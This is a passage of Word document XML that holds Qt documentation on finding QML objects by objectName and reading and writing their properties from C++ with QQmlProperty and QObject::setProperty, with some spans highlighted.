          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"color"</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"red"</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CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Note that an </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object may have multiple children with the same</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objectName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2921" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creates multiple instances of its delegate, so if its delegate is declared with a particular objectName, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2922" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will have multiple children with the same</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objectName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In this case,</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2923" w:anchor="findChildren" w:history="1">
        <w:r w:rsidRPr="00EB7BA7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::findChildren</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to find all children with a matching</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objectName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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064AC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Warning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>While it is possible to use C++ to access and manipulate QML objects deep into the object tree, we recommend that you do not take this approach outside of application testing and prototyping.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>One strength of QML and C++ integration is the ability to implement the QML user interface separately from the C++ logic and dataset backend, and this strategy breaks if the C++ side reaches deep into the QML components to manipulate them directly.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This would make it difficult to, for example, swap a QML view component for another view, if the new component was missing a required</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objectName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is better for the C++ implementation to know as little as possible about the QML user interface implementation and the composition of the QML object tree.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2630" w:name="accessing-members-of-a-qml-object-type-f"/>
      <w:bookmarkStart w:id="2631" w:name="_Toc483001106"/>
      <w:bookmarkStart w:id="2632" w:name="_Toc483004075"/>
      <w:bookmarkStart w:id="2633" w:name="_Toc483604439"/>
      <w:bookmarkStart w:id="2634" w:name="_Toc483605659"/>
      <w:bookmarkEnd w:id="2630"/>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accessing Members of a QML Object Type from C++</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2631"/>
      <w:bookmarkEnd w:id="2632"/>
      <w:bookmarkEnd w:id="2633"/>
      <w:bookmarkEnd w:id="2634"/>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2635" w:name="properties"/>
      <w:bookmarkStart w:id="2636" w:name="_Toc483001107"/>
      <w:bookmarkStart w:id="2637" w:name="_Toc483004076"/>
      <w:bookmarkStart w:id="2638" w:name="_Toc483604440"/>
      <w:bookmarkStart w:id="2639" w:name="_Toc483605660"/>
      <w:bookmarkEnd w:id="2635"/>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2636"/>
      <w:bookmarkEnd w:id="2637"/>
      <w:bookmarkEnd w:id="2638"/>
      <w:bookmarkEnd w:id="2639"/>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064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any properties declared in a QML object are automatically accessible from C++.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Given a QML item like this:</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// MyItem.qml</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import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QtQuick</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2.0</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Item</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someNumber</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100</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lang w:val="en-US"/>
        </w:rPr>
      </w:pP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CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The value of the</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someNumber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property can be set and read using</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2924" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2925" w:anchor="setProperty" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::setProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2926" w:anchor="property" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::property</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>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QQmlEngine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> engine</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QQmlComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>engine</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"MyItem.qml"</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QObject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object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component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create</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490E7E"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hyperlink r:id="rId2927" w:anchor="qDebug" w:history="1">
        <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="pln"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:color w:val="FFFFFF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qDebug</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</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pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Property value:"</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pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlProperty</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"someNumber"</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toInt</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2"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QQmlProperty</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write</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object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"someNumber"</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5000</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490E7E"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hyperlink r:id="rId2928" w:anchor="qDebug" w:history="1">
        <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="pln"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:color w:val="FFFFFF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qDebug</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</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pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Property value:"</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pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
